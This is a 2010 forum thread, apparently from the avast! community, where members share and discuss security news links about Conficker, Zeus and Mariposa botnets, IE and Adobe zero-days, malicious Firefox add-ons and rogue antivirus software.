http://www.microsoft.com/technet/security/advisory/980088.mspx
To have us fix this problem for you, go to the "Fix it for me" section. If you would rather fix this problem yourself, see the workaround section in the security advisory.
http://support.microsoft.com/kb/980088
-
Conficker have done it again........
Conficker virus outbreak at Greater Manchester Police
http://www.sophos.com/blogs/gc/g/2010/02/02/conficker-virus-outbreak-greater-manchester-police/
-
You would think by now that even the police would be ready for conficker... ::)
And they want a direct link to our data... :( (http://forum.avast.com/index.php?topic=55083.msg465735#new)...
-
AplusWebMaster at the Safer-Networking Forums is really good about posting security threats: http://forums.spybot.info/forumdisplay.php?f=28 (http://forums.spybot.info/forumdisplay.php?f=28)
-
Hi malware fighters,
Unauthorized hackers can now have access to backdoors left in ISP auditing software,
Cisco was rather upfront about this, but for other software we don't even know where it is.
This to prevent suspects to be warned by their ISP they are being monitored via backdoors:
http://www.darkreading.com/insiderthreat/security/perimeter/showArticle.jhtml?articleID=222600993
Always thought the Internet was wormholed, now with these 6 issues it is proven,
Exploiting Lawful Intercept to Wiretap the Internet
Many goverments require telecommunications companies to provide interfaces that law enforcement can use to monitor their customer's communications. If these interfaces are poorly designed, implemented, or managed they can provide a backdoor for attackers to perform surveillance without lawful authorization. Most lawful intercept technology is proprietary and difficult to peer review. Fortunately, Cisco has published the core architecture of it's lawful intercept technology in an Internet Draft and a number of public configuration guides.
This talk will review Cisco's architecture for lawful intercept from a security perspective. The talk will explain how a number of different weaknesses in its design coupled with publicly disclosed security vulnerabilities could enable a malicious person to access the interface and spy on communications without leaving a trace. The talk will explain what steps network operators need to take to protect this interface. The talk will also provide a set of recommendations for the redesign of the interface as well as SNMP authentication in general to better mitigate the security risks.
Warnings were there from 2008:
http://www.forbes.com/2010/02/03/hackers-networking-equipment-technology-security-cisco.html
polonus
-
Aurora Attack - Zero day exploit in IE6
Aurora attacks, which is known to be originated from china, is a major attack in the recent past which used an Internet explorer exploit code to attack companies like Google and Adobe and succeeded in stealing some intellectual properties.
http://www.norman.com/security_center/security_center_archive/2010/77717/en-us
-
Microsoft slates colossal Windows patch next week
Ties record with 13 security updates, plans to fix 26 bugs in Windows, Office
http://www.computerworld.com/s/article/9152258/Microsoft_slates_colossal_Windows_patch_next_week?source=rss_news
http://www.microsoft.com/technet/security/bulletin/ms10-feb.mspx
-
Microsoft slates colossal Windows patch next week
Ties record with 13 security updates, plans to fix 26 bugs in Windows, Office
http://www.computerworld.com/s/article/9152258/Microsoft_slates_colossal_Windows_patch_next_week?source=rss_news
thanks for the heads up, was expecting something just for IE but it seems more is involved.
-
Microsoft's Mundie calls for 'internet driving licence' :o
http://www.v3.co.uk/v3/news/2257372/microsoft-mundie-calls
-
Microsoft's Mundie calls for 'internet driving licence' :o
http://www.v3.co.uk/v3/news/2257372/microsoft-mundie-calls
yeah ;D will be remembered as a good joke in a few days :D
-
Microsoft's Mundie calls for 'internet driving licence' :o
http://www.v3.co.uk/v3/news/2257372/microsoft-mundie-calls
Not only need a license but they should be re-tested every few years.
It would certainly cut down on the number of infected systems.
-
Microsoft's Mundie calls for 'internet driving licence' :o
http://www.v3.co.uk/v3/news/2257372/microsoft-mundie-calls
Not only need a license but they should be re-tested every few years.
It would certainly cut down on the number of infected systems.
...yeah, and hackers are dumb enough to fail and not get such a license right?
adding: kids would learn and succeed too eventually...and then spread the malware sent to them by hackers, just for fun.
-
If Microsoft is taking this thing seriously, then we all can't use our computers without a license.
I'll just throw my PC in the garbage and enjoy nature instead.
-
I'll just throw my PC in the garbage and enjoy nature instead.
same here :) wondering sometimes if it would be so bad ???
-
Hi malware fighters,
Gumblar and Conficker dominate the malware scene:
http://www.security.nl/image/2555/1
better look here:
http://www.security.nl/popup/2555
pol
P.S. 13% of the malware was Adobe related exploits....
-
Mozilla overlooked malware-laced Firefox add-ons
http://www.theregister.co.uk/2010/02/05/malicious_firefox_extensions/
Two Firefox add-ons available for months on Mozilla's website infected users with malware that stole passwords and opened a backdoor on Windows machines, the open-source browser maker has confirmed.
The add-ons, available on an experimental section of Mozilla's official add-on download site carried trojans that have been detected since 2008 by commercial anti-virus products. And yet they weren't removed until late January and earlier this week because a scanning tool used to vet add-ons during upload failed to catch the malicious files.
-
Fake Firefox Update Pages Push Adware
http://threatcenter.blogspot.com/2010/02/fake-firefox-update-pages-push-adware.html
-
Mozilla overlooked malware-laced Firefox add-ons
The SoThink detection may have been a false positive.
http://blog.mozilla.com/addons/2010/02/04/please-read-security-issue-on-amo/comment-page-1/#comment-45452"Alan Baxter says:
February 6, 2010 at 11:51 am
It looks like the current scans of the SoThink 4.0 addon may have been false positives. SoThink updated the addon to 4.2 because of false positive reports in May 2008. Did AMO verify that 4.0 actually contained a trojan?
From http://74.125.47.132/search?q=cache:aou1K7snX3QJ:https://addons.mozilla.org/en-US/firefox/addons/versions/6541+site:addons.mozilla.org+sothink+%22version+history%22&cd=1&hl=en&ct=clnk&gl=us:
Version 4.2 — May 16, 2008 — 685 KB
Works with:
* Firefox: 1.5 – 3.0b3
Fixed Bug
* Some of anti-virus softwares misreported that it contained virus.
-
Conficker.........again..... ???
Conficker outbreak infects Leeds hospital servers
http://www.theregister.co.uk/2010/02/09/conficker_nhs_outbreaks/
ZeuS tracker shrinks takedowns from days to minutes
http://www.theregister.co.uk/2010/02/05/zeus_tracker/
Leaky anti-virus defences letting malware through
http://www.theregister.co.uk/2010/02/08/security_scanner_shortcomings/
-
First the police, then the health service...what is next, the the fire service?
Seriously though, ESPECIALLY in those areas there should be safeguards against things like that, like no external media or no personal laptops etc. as this seems to be a vector for attack...
-
One Mozilla malware report turned out to be a false positive
Mozilla overlooked malware-laced Firefox add-ons
http://www.theregister.co.uk/2010/02/05/malicious_firefox_extensions/
Two Firefox add-ons available for months on Mozilla's website infected users with malware that stole passwords and opened a backdoor on Windows machines, the open-source browser maker has confirmed.
The add-ons, available on an experimental section of Mozilla's official add-on download site carried trojans that have been detected since 2008 by commercial anti-virus products. And yet they weren't removed until late January and earlier this week because a scanning tool used to vet add-ons during upload failed to catch the malicious files.
Mozilla has announced that their report of a trojan in the SoThink Video Downloader extension was a false positive after all.
http://blog.mozilla.com/addons/2010/02/09/update-on-the-amo-security-issue/
-
One Mozilla malware report turned out to be a false positive
Mozilla overlooked malware-laced Firefox add-ons
http://www.theregister.co.uk/2010/02/05/malicious_firefox_extensions/
Two Firefox add-ons available for months on Mozilla's website infected users with malware that stole passwords and opened a backdoor on Windows machines, the open-source browser maker has confirmed.
The add-ons, available on an experimental section of Mozilla's official add-on download site carried trojans that have been detected since 2008 by commercial anti-virus products. And yet they weren't removed until late January and earlier this week because a scanning tool used to vet add-ons during upload failed to catch the malicious files.
Mozilla has announced that their report of a trojan in the SoThink Video Downloader extension was a false positive after all.
http://blog.mozilla.com/addons/2010/02/09/update-on-the-amo-security-issue/
Wow. I've got to wonder how much of a backlash Mozilla's going to get; IMHO, it's going to be big and well-deserved. First, letting a trojan into addons, even experimental addons, is just plain a bad decision, given there were - and are - tools detecting said trojan. Smearing SoThink - even accidentally - is only going to make it worse.
Maybe Mozilla just had a lot of bad luck, but the circumstances are sure weird.
-
New Russian Botnet Tries to Kill Rival
An upstart Trojan horse program has decided to take on its much-larger rival by stealing data and then removing the malicious program from infected computers.
http://www.nytimes.com/external/idg/2010/02/09/09idg-new-russian-botnet-tries-to-kill-rival-90923.html
-
New Russian Botnet Tries to Kill Rival
An upstart Trojan horse program has decided to take on its much-larger rival by stealing data and then removing the malicious program from infected computers.
http://www.nytimes.com/external/idg/2010/02/09/09idg-new-russian-botnet-tries-to-kill-rival-90923.html
lol Polonus has already mentioned that the first thing a rogue would do is get rid of the competition, to avoid other malware interference...I would add to make sure the victim will send the cash to the winner only :D This seems confirmed here ;D
-
Security chip that does encryption in PCs hacked
http://news.yahoo.com/s/ap/20100208/ap_on_hi_te/us_tec_crypto_chip_cracked;_ylt=AlgYlCohoMwaXKR3qvFz_VwjtBAF;_ylu=X3oDMTJyZzFmdXMxBGFzc2V0A2FwLzIwMTAwMjA4L3VzX3RlY19jcnlwdG9fY2hpcF9jcmFja2VkBGNwb3MDMgRwb3MDNQRzZWMDeW5fdG9wX3N0b3J5BHNsawNzZWN1cml0eWNoaXA
-
***
Certainly not good news, Pondus.
Almost nothing is secure now.
***
-
Very interesting article. An extremely scary one too. Thanks for the link Pondus.
-
Anybody seen this? The Zimuse virus returns:
http://www.thewindowsclub.com/retro-virus-comes-back-to-hit-hard-disk-mbr (http://www.thewindowsclub.com/retro-virus-comes-back-to-hit-hard-disk-mbr)
It waits 20-40 days, then overwrites the user's MBR and reboots the computer. Result: fatal. (http://www.youtube.com/watch?v=KgjX4LQrkgI (http://www.youtube.com/watch?v=KgjX4LQrkgI) shows the virus in action)
Because it's installation is pretty much silent, users frequently have no idea what hit them.
-
Windows Activation Technologies Update for Windows 7
http://windowsteamblog.com/blogs/genuinewindows/archive/2010/02/11/windows-activation-technologies-update-for-windows-7.aspx
-
Windows Activation Technologies Update for Windows 7
http://windowsteamblog.com/blogs/genuinewindows/archive/2010/02/11/windows-activation-technologies-update-for-windows-7.aspx
I think this was posted already, may be in the update section, yesterday ;)
-
and here we go again......
Adobe to rush out another critical Reader patch
http://www.computerworld.com/s/article/9156038/Adobe_to_rush_out_another_critical_Reader_patch?source=rss_news
-
Kaspersky defends false detection experiment
http://www.theregister.co.uk/2010/02/10/kaspersky_malware_detection_experiment/
-
Adobe to rush out another critical Reader patch
http://www.computerworld.com/s/article/9156038/Adobe_to_rush_out_another_critical_Reader_patch?source=rss_news
I think this one is in the >> Updates << topic also already.
-
Kaspersky defends false detection experiment
http://www.theregister.co.uk/2010/02/10/kaspersky_malware_detection_experiment/
Sounds like a lot of a**e covering going on at kasperski. They know that samples of undetected files are sent to all AVs in VT that didn't detect, part of the VT agreement I believe.
I would say they have shot themselves in the foot. At worse it is almost malicious and at best potentially damaging to their reputation.
-
Kaspersky defends false detection experiment
http://www.theregister.co.uk/2010/02/10/kaspersky_malware_detection_experiment/
Sounds like a lot of a**e covering going on at kasperski. They know that samples of undetected files are sent to all AVs in VT that didn't detect, part of the VT agreement I believe.
I would say they have shot themselves in the foot. At worse it is almost malicious and at best potentially damaging to their reputation.
Didn't we go through something like that not to long ago ??? Not very pleasant for the customer or the Company. :'(
-
Hi bob3160,
At the outset of such a policy then, aren't they thinking about the consequences? This is almost infantile behavior or just started on an impulse. But you can almost know for sure an issue like this will seriously backfire later, why then start it in the first place.? Unbelievable, the world is a surrealistic place sometimes,
polonus
-
Comodo and Chromium now blocks major sites with poor certification.
Chromium browser remixed as a security dragon (http://download.cnet.com/8301-2007_4-10453048-12.html?tag=mncol;title)
Source: The Download Blog
-
Hi malware fighters,
Every day spammers will send two hundred billion spam messages, mainly through botnets. From numbers provided by M86 security 78% of all spam messages are coming from the top 5 botnets. The top two are Rustock and Pushdo botnets, together serving up 54% of total spam.
The number of malicious spam messages, email with a malicious attachment or with a link to a drive-by-download website, grew to three million a day. That means fivefold the number of the 600 million number seen during the first half of the year 2009. "It is important to make out the main spam mailers, so the industry can take action", according to Technical Strategy vice president Bradley Anstis.
Zero-day
The security researcher discovered in the second half of last year that 40% of attacks worked through zero-day security leaks. "One of the biggest problems with zero-days is the time developing between discovery and in the wild abuse and the launch of a patch by the software vendor."
This so-called "Window of Vulnerability" is getting smaller and smaller all the time, but even when a patch has been issued, users are slow to implement it. Take for instance the so-called MDAC-hole, patched during 2006, and still very popular with malcreants,
polonus
-
Zeus Trojan found on 74,000 PCs in global botnet (http://news.cnet.com/8301-27080_3-10455525-245.html?tag=newsEditorsPicksArea.0)
Source: CNET News
-
Ads poisoning – JS:Prontexi (http://blog.avast.com/2010/02/18/ads-poisoning-%E2%80%93-jsprontexi/)
Directly from an Avast! blog entry...
The malware usually spreads through web infection placed on innocent, badly secured websites. The ad infiltration method is growing in popularity alongside with the website infections. Now we are facing probably the biggest ad poisoning ever made – all important ad services are affected. It means that computers might get infected just by reading your favorite newspaper or by doing search on famous web indexers. We named the source of this attack JS:Prontexi – JavaScript code which initiates infection on victims computer using various vulnerabilities including latest PDF exploits.
-
Zeus Trojan found on 74,000 PCs in global botnet
http://news.cnet.com/8301-27080_3-10455525-245.html
Mystery malware nuke's US city's Windows PCs
Malicious code wipes out Windows PCs
http://computerworld.co.nz/news.nsf/security/windows-nuked-by-malware-at-city-of-norfolk
-
Conficker is alive and well......
Another NHS hospital stricken with Conficker virus
http://www.theregister.co.uk/2010/02/18/conficker_nhs/
Kneber: An Old Botnet Dressed Up in New Clothes
http://www.pcmag.com/article2/0,2817,2360032,00.asp
Google attacks traced back to Chinese schools
http://www.v3.co.uk/v3/news/2258188/google-attacks-traced-back
-
Almost a year later, Conficker still lurking
http://www.sophos.com/security/threat-spotlight/index.html#threat1
-
(http://i.zdnet.com/blogs/chinagoog.jpg)
Google cyber attacks traced to Chinese schools. (http://blogs.zdnet.com/BTL/?p=30997&tag=nl.e589)
Sorry Pondus,
Didn't see your post. :-[
-
***
Mis-placed botnet warning :
http://forum.avast.com/index.php?topic=55913.msg472331#msg472331
***
-
Not to downplay the Kneber botnet threat in any way.
http://www.sophos.com/blogs/gc/g/2010/02/19/zeus-kneber-botnet-unmasked/
http://www.krebsonsecurity.com/2010/02/zeus-a-virus-known-as-botnet/
Perhaps underlines even more - never go to the internet without adequate protection against malware. The botnets are families that will continue to grow and mutate and grow and on and on and on...
-
Hi mkis,
Part of a solution to the growing problem: http://www.malwaredomains.com/wordpress/?p=671
polonus
-
Thanks Pol.
I've bookmarked the site for my personal reference - ideally placed link for security warnings and notices.
I also found the following under Defense in Depth: IP and Netblock Blocking (in right-hand column)
- anecdotal example but revealing story I thought
http://blog.washingtonpost.com/securityfix/2007/10/taking_on_the_russian_business.html
What a dilemma, I would expect the option to block would be first choice but I suppose they didn't want to lose the business - and then things got out of hand. I wonder how common such situations are in the US.
-
Hi mkis,
Part of a solution to the growing problem: http://www.malwaredomains.com/wordpress/?p=671
Why not use the latest?
aurora, zeus, phishing, pushdo,rogue domains to block
http://www.malwaredomains.com/wordpress/?p=851
Archives
■ February 2010 (9)
http://www.malwaredomains.com/wordpress/?m=201002
-
Thanks YoKenny. You always are up to date, aren't you? I guess Polonus was just posting an instance.
Here is my bookmark http://www.malwaredomains.com/wordpress/
-
Polonus here with a European threat, because of the regulations that made MS come up with an aternative browser screen, which initiative can be grossly abused by malcreants:
http://www.sophos.com/blogs/gc/g/2010/02/19/european-internet-explorer-users-invited-choose-browser/
D
-
Just made a topic about this, but thought I would post here too anyway.
Modern Warfare 2 servers hacked, Trojan's inserted.
http://www.infinityward.com/forum/viewtopic.php?f=24&t=181646
Oh, now thats just plain evil grr.
-
Polonus here with a European threat, because of the regulations that made MS come up with an aternative browser screen, which initiative can be grossly abused by malcreants:
http://www.sophos.com/blogs/gc/g/2010/02/19/european-internet-explorer-users-invited-choose-browser/
D
I do worry, however, whether cybercriminals might attempt to take advantage of this initiative by creating bogus browser choice screens that could pop up on innocent users' PCs and potentially lead them to a malicious download.
Polonus,
It's not a current threat, it's a blog post and someones opinion of a possibility of a potential problem.
-
Hi bob3160,
If a benevolent blogger can think this up, why cannot a malcreant? There are also smart cyber criminals, you know. The man in the nicest suit often has the.. eh... most evil mind, often that is....So threats come from where you least expect them. f you want to keep them at bay, prepare yourself,
polonus
-
Hi malware fighters,
A so-called "Chuck Norris"(name mentioned inside the malware code) botnet cracks routers and modems: http://praguemonitor.com/2010/02/16/czech-experts-uncover-global-virus-network
Czech Defense Malware Researchers found the botnet and servers in South-America, Europe and China.
A good advice to you all - change that modem or router standard password to be protected, according to Jan Vykopal of the Masaryk University
polonus
-
Devil Mountain Software a product to avoid (http://blogs.zdnet.com/BTL/?p=31024&tag=nl.e539)
-
NOT the real VirusTotal.com
Julio Canto (of VirusTotal fame) has noticed that somebody decided to cash in on the good name of the site with the following domain:
virus-total(dot)in
here (http://sunbeltblog.blogspot.com/2010/02/not-real-virustotalcom.html)
nmb
-
Microsoft has warned Windows users to be on their guard against a piece of rogue antivirus software passing itself off as Microsoft Security Essentials.
Security essentials 2010 is a piece of software Microsoft said installs a fake virus scanner on your machine and]monitors and blocks processes it doesn't like.
http://www.theregister.co.uk/2010/02/26/microsoft_security_essentials_rogue/
http://blogs.technet.com/mmpc/archive/2010/02/24/if-it-calls-itself-security-essentials-2010-then-it-s-possibly-fake-innit.aspx
-
Microsoft investigating new IE browser vulnerability
The company warned that an attacker could host a maliciously crafted web page and run arbitrary code if they could convince a user to visit the web page and then get them to press the F1 key in response to a pop up dialog box.
http://blogs.zdnet.com/security/?p=5560
IE users, thou be warned.
Dont know whether this is posted any where, but according to me, its brand new ;)
-
New IE security issue exposed in Windows XP
A new security issue in Internet Explorer has been exposed by a Polish technical research group.
http://www.pcpro.co.uk/news/security/355945/new-ie-security-issue-exposed-in-windows-xp
-
New IE security issue exposed in Windows XP
Please read the previous post. ;)
-
***
Warning of a DOS vulnerability :
http://forum.avast.com/index.php?topic=56422.msg476097#msg476097
***
-
Spam disguised as spam notification
In their constant battle against anti-spam filters, spammers have recently started to camouflage their messages as spam quarantine notifications
http://www.net-security.org/secworld.php?id=8947
nmb
-
That is hardly a new method, they have been doing this and similar for ages, usually disguised as undeliverable email. The user wants to know what and why and opens stupidly it to find out.
I can't believe this is any real benefit as using ant means of deception should turn the recipient off rather than encourage them to read it. I guess there is more than one born every minute.
-
Hi malware fighters,
Recent zero-days in the framework of the recent zero day initiative (because software vendors and developers do not take the reported leaks not seriously enough): http://www.zerodayinitiative.com/advisories/upcoming/
So keep an eye on this list,
polonus
-
Hi malware fighters,
Using the monoculture Google search-engine becomes more and more dangerous, because the potential of the Google market-share attracts cyber-criminals (malicious search-results, Fake-av etc. etc.) according to F-Secure's Sean Sullivan. Bing has far less potential malicious search results.
Use Fx with No-Script to be secure, and use another search-engine (Ixquick for instance),
Link: http://www.f-secure.com/weblog/
polonus
-
Spain busts global "botnet" masterminds
http://uk.reuters.com/article/idUKTRE6214ST20100303?pageNumber=1&virtualBrandChannel=11700
3 arrested with takedown of huge 'botnet' infecting millions of PCs
http://www.mercurynews.com/business/ci_14498591?source=rss&nclick_check=1
-
Spain busts global "botnet" masterminds
http://uk.reuters.com/article/idUKTRE6214ST20100303?pageNumber=1&virtualBrandChannel=11700
3 arrested with takedown of huge 'botnet' infecting millions of PCs
http://www.mercurynews.com/business/ci_14498591?source=rss&nclick_check=1
very good news ;)
-
Yes :) That easy huh? Incredible
-
Hi malware fighters,
Using the monoculture Google search-engine becomes more and more dangerous, because the potential of the Google market-share attracts cyber-criminals (malicious search-results, Fake-av etc. etc.) according to F-Secure's Sean Sullivan. Bing has far less potential malicious search results.
Use Fx with No-Script to be secure, and use another search-engine (Ixquick for instance),
Link: http://www.f-secure.com/weblog/
polonus
That is the same as saying don't use Windows, use Linux because it's safer.
The actual truth is that Google Search is used far more widely than Bing and therefor is the ideal target for attacks.
Google search itself certainly isn't any less safe than Bing or any other search engine.
-
I will exceptionally agree with Bob, sticking to Google search engine here. Why? it's the best search engine - and by far - and it's rarely (?) mentioned, because it's too obvious ;D As to security, associated with Firefox, you get security alerts for bad sites (from Google).
-
Cant help but feel that google is just carrying too much now. And what they carry has become too diverse. An enormous pile of garbage in many ways, but saved always by the standout brilliance of the search box (okay and the engine that powers it). For how much longer can we expect google search to bear the haphazard weight of the sprawling behemoth? Sergey is often not happy, Schmidt is withdrawing from other responsibilities so he can attend better to the flagship, and where is the other guy got to nowdays? I'm kidding really, but just cos to be too real would be to look at the scale of the damage could arise if the search engine became compromised. Even just a little bit. And regardless of what anyone says, the team has fallen off the tracks just that bit. I think so anyway. But has to be said, nothing is unsurmountable to the genius that is the google team. I hope that still stands.
-
Confessions of a Windows 7 pirate
Really good read :
In the interest of research, I’ve been digging into message boards and forums run by unabashed Windows enthusiasts who are intent on breaking Microsoft’s activation technology. I’ve had these forums bookmarked for years and stop in every once in a while just to see what’s new. This time I decided to drop by and actually try some of tools and utilities to see if I could become a pirate, too.
here : http://blogs.zdnet.com/Bott/?p=1817
nmb
-
How FBI, police busted massive botnet
http://www.theregister.co.uk/2010/03/03/mariposa_botnet_bust_analysis/
Mariposa botnet
http://pandalabs.pandasecurity.com/mariposa-botnet/
-
Here is moore
Monster botnet held 800,000 people's details
Fourth zombie admin could be in South America
http://www.theregister.co.uk/2010/03/04/mariposa_police_hunt_more_botherders/
New exploit technique nullifies major Windows defense
Google engineer posts sample code to show how to bypass DEP in Windows
http://www.computerworld.com/s/article/9165378/New_exploit_technique_nullifies_major_Windows_defense?taxonomyId=17&pageNumber=1
-
Microsoft Security Bulletin Advance Notification for March 2010
http://www.microsoft.com/technet/security/Bulletin/ms10-mar.mspx
-
Opera 10.x Content-Length Buffer Overflow PoC
http://www.securitylab.ru/poc/391364.php
Sorry for link in Russian but probably it's important in any case due to exploit code is given.
-
Hi malware fighters,
A major threat are the growing number of maliciously infected trusted and reputable websites, a new start-up in the security concerning this threat is Dasient Web Anti Malware:
http://wam.dasient.com/wam/whydasient_threat
polonus
-
Hi malware fighters,
A new variant of the BlackEnergy Trojan can destroy infested computers, as researchers have found: http://www.secureworks.com/research/threats/blackenergy2/
The first version of BlackEnergy was being used for Ddos-attacks onto Georgia in 2008.
After all versions that can be produced with the do-it-yourself-toolkit, version 1.9.2 is the latest official variant.
Researchers at SecureWorks found that BlackEnergy 2 has been under construction now for more than two years.
Apart from its predecessor, this version uses modern rootkit/process-injection techniques, strong encryption and modular architecture.
When the victim does not have full admin rights, the malware will use an exploit for a vulnerability from 2008, to get full rights.
In this way it is still possible for the rootkit to install.
Kill commando
BlackEnergy also has plug-in support, to add all sorts of code to the Trojan.
At the moment this is code is used to send spam and for stealing online-banking log-on data.
The "banking Trojan plug in" is similar to that in Zeus Trojan and has been developed to destroy victim computers files.
To do that an attacker can give a special "kill" command. The Trojan will then overwrite the first 4.096 clusters with random data, and then tries to delete "ntldr" and "boot.ini" files.
"This functionality will be uses after the log-on data has been stolen, to prevent victims notice money has disappeared from their accounts,
and victim will notice the bank." For the moment the Trojan just attacks Russian and Ukrainian banks.
And that is remarkable because previously Russian hackers left their countrymen alone.
Plugins
According to Joe Stewart BlackEnergy 2 is a big innovation compared to its predecessor.
"With the existing plugins it gives three access points for cybercrime."
The Trojan cannot be get as a toolkit, but when it is, it will be more popular than the previous version.
"Whatever there is more room for innovation of stealth and functionality in the coming BlackEnergy 2 versions."
For the crypto-lovers among us here is FireEye publication of the first version of the malware: http://blog.fireeye.com/research/2010/03/black-energy-crypto.html
polonus
-
Hi malware fighters,
Online ads spread a dangerous Trojan
and ad-sellers do not make it easy to intercept the malcode.
The ads in question have malicious JavaScript that will launch eight exploits onto visitors.
After an exploit has been successful a Trojan downloader is being installed,
that then will install Zeus or Bredolab Trojan.
Especially Zeus has made the news during recent months
because the malicious software is plundering bank accounts on a large scale.
Adblocker
By hacking ad-servers or posing as a legit advertiser,
cybercriminals can easily get their malcode on the machines of many Internet users.
"The problem is even larger because legitimate ads are often heavily obfuscated
to circumvent adblockers", according to Sophos's Fraser Howard.
Last weekend the av researcher saw loads of adservers where malcreants had
added malicious Javascript to ads.
"Quite a number of popular websites that load ads from these servers,
have been hit by these attacks," according to Fraser.
The malcode directs to the domain name googleanalitics.net,
that is posing as the legit Google Analytics website.
Links: http://www.sophos.com/blogs/sophoslabs/?p=8960
http://isc.sans.org/diary.html?storyid=8350
Your best protection is to use Firefox with ABP +, NoScript and RequestPolicy extensions installed,
polonus
-
Sounds like a day late and a dollar short as this has been on the avast blog about the massive spread of malware through poisoned adverts, http://blog.avast.com/2010/02/18/ads-poisoning-%e2%80%93-jsprontexi/ (http://blog.avast.com/2010/02/18/ads-poisoning-%e2%80%93-jsprontexi/).
-
I dont think anyone has posted this advisory yet. It's about 2 weeks old.
http://secunia.com/advisories/38435
Tielei Wang has discovered a vulnerability in Google Picasa, which can be exploited by malicious people to potentially compromise a user's system.
The vulnerability is caused due to an integer overflow error in PicasaPhotoViewer.exe when processing JPEG files. This can be exploited to cause a heap-based buffer overflow by tricking a user into opening a specially crafted JPEG file and e.g. zooming in.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is confirmed in PicasaPhotoViewer.exe version 3.6.95.25, included in Google Picasa 3.6 build 95.25. Prior versions may also be affected.
Solution
Update to version 3.6 build 105.41.
-
Oh add this too for Opera 10.x users
http://secunia.com/advisories/38820
I dont use Opera, so feel free to qualify my entry if you think necessary
-
Hi folks,
Does not mind, only important thing is that we have them all nicely addressed here in this thread.
Users of the forums does not have to look elsewhere and have them all ready at hand to be forewarned, and so forearmed against the threats all sorts,
pol
-
OK, thanks for the good news guys, that means I can expect two warnings when I launch Secunia next time (I don't have it running constantly) >>> 1 for picasa, and a second for Opera 10.5 ;D
-
honestly havent run Secunia OSI for ages - only this time because I ran repair on XP being recondition after 2 years use.
really, for those who are having glitches upgrading to avast 5, running Secunia OSI should be a first stop.
http://secunia.com/vulnerability_scanning/online/
click Start Scanner - choose display only insecure, click start - scanner runs, generates report at finish
Edit - my OSI test --> Macromedia sub-optimal
- so check Statistics in avast Summary and find there is no picture (graph) ???
Follow Secunia advice download most recent Flashplayer and Flashplayer Macromed (wit uninstall) utility and run new Secunia scan
- report reads all good (optimal performance) - so check Statistics in avast Summary - hey, picture!! :)
-
***
Microsoft: Don't press F1 key in Windows XP and any earlier version back to W2000 including Server.
Ignore sites that nag to press the Help key, says zero-day bug advisory.
March 1, 2010 (Computerworld) Microsoft told Windows XP users today not to press the F1 key when prompted by a Web site, as part of its reaction to an unpatched vulnerability that hackers could exploit to hijack PCs running Internet Explorer (IE).
In a security advisory issued late Monday, Microsoft confirmed the unpatched bug in VBScript that Polish researcher Maurycy Prodeus had revealed Friday, offered more information on the flaw and provided some advice on how to protect PCs until a patch shipped.
"The vulnerability exists in the way that VBScript interacts with Windows Help files when using Internet Explorer," read the advisory. "If a malicious Web site displayed a specially crafted dialog box and a user pressed the F1 key, arbitrary code could be executed in the security context of the currently logged-on user."
For the rest of the story:
http://www.computerworld.com/s/article/print/9164038/Microsoft_Don_t_press_F1_key_in_Windows_XP?taxonomyName=Spam%2C+Malware+and+Vulnerabilities&taxonomyId=85
***
-
hackers exploit oscars
http://www.sophos.com/blogs/gc/g/2010/03/08/hackers-exploit-oscar
-
Here's a couple more from latest Sophos E-news
John C Dvorak and hundreds of others hacked on Twitter
http://www.sophos.com/blogs/chetw/g/2010/03/06/john-dvorak-falls-victim-twitter
Bad Bunny! Energizer Battery USB charger blamed for backdoor Trojan
http://www.sophos.com/blogs/gc/g/2010/03/08/bad-bunny-energizer
Are we entering some phase where can expect an onslaught of malware exploits? ..a plague, no less
-
Secunia has updated the Secunia Online Software Inspector (OSI) with new
rules for detecting insecure software.
Run the Secunia OSI to make sure that your system is up-to-date:
http://secunia.com/vulnerability_scanning/online/
-
Microsoft warns of new IE bug; attacks under way
Internet Explorer 6 and its 2006 successor, IE7, contain a vulnerability that can be used by attackers to inject malicious code into a Windows PC. The oldest and newest of Microsoft's supported browsers, IE 5.01 and IE8, respectively, are not vulnerable to such attacks.
http://www.computerworld.com/s/article/9168138/Microsoft_warns_of_new_IE_bug_attacks_under_way?source=rss_news
http://www.informationweek.com/news/software/showArticle.jhtml?articleID=223300150
Twitter takes action on spammers and scammers
http://www.pcw.co.uk/v3/news/2259231/twitter-takes-action-spammers
-
Twitter takes action on spammers and scammers
yeah, but what for if ???
Microsoft could still buy Twitter, says Ballmer
http://www.pcw.co.uk/v3/news/2258895/microsoft-twitter-ballmer
;D
-
100% free pr0n ::)
Pinball Publisher Network: Yet more blackhat SEO goodness
Going through the latest Google results for new malicious goodness, I stumbled upon a URL I was fully expecting to be serving me with a fake AV (the last 10 or so I'd checked had done), but alas no, not this time. This time I was to be served a page that led me to a fake search results page (PPC fraud);
http://hphosts.blogspot.com/2010/03/pinball-publisher-network-yet-more.html
-
Microsoft races to plug IE hole after exploit code released
Microsoft said on Friday it is testing a patch to fix a new hole in Internet Explorer 6 and IE 7 following the release of exploit code on the Internet.
http://news.cnet.com/8301-27080_3-20000392-245.html
-
F-Secure with new security blog
http://safeandsavvy.f-secure.com/
-
Microsoft offers 'fix-it' workaround for IE zero-day
Microsoft has released a one-click “fix-it” workaround to help Web surfers block malware attacks against an unpatched vulnerability in its flagship Internet Explorer browser.
http://blogs.zdnet.com/security/?p=5726&tag=nl.e589
(Or you can just upgrade to IE8 )
-
F-Secure with new security blog
http://safeandsavvy.f-secure.com/
http://www.f-secure.com/weblog/archives/00001906.html
You'll notice that the name is pink. That's part of our new brand but it also reflects the authorship. Safe and Savvy's contributors are the female employees of F-Secure (mostly).
nmb
-
Looking for malware in all the wrong places?
Instead of looking for known patterns -- whether of instructions and data, or of actions -- wouldn't it be great if we could look for anything that is malicious? That may sound like a pipe dream.
Not to me.
nmb
-
Hackers lock Zeus crimeware kit with Windows-like anti-piracy tech
http://www.pcworld.idg.com.au/article/339670/hackers_lock_zeus_crimeware_kit_windows-like_anti-piracy_tech/
-
Waledac botnet 'decimated' by MS takedown
http://www.theregister.co.uk/2010/03/16/waledac_takedown_success/
Anti-virus suites still can't block Google China attack
http://www.theregister.co.uk/2010/03/16/aurora_av_test_fail/
-
Here we go again.......
New password-stealing virus targets Facebook
http://in.reuters.com/article/lifestyleMolt/idINTRE62G5A420100318
-
Here we go again.......
New password-stealing virus targets Facebook
http://in.reuters.com/article/lifestyleMolt/idINTRE62G5A420100318
Yep...
I got this one...(as well as the ups one again...)
Wanted to download it to see if it was detected or not, but hotmail wouldn't let me...can't even forward it to the VT service as MS trashes the attachment because it is malicious...at least MS is on the ball on this one...
Oddly though, my email address isn't spg_pentagram ???
-
Hi malware fighters,
In the last 48 hours the number of Koobface (anagram of Facebook) C&C servers has doubled:
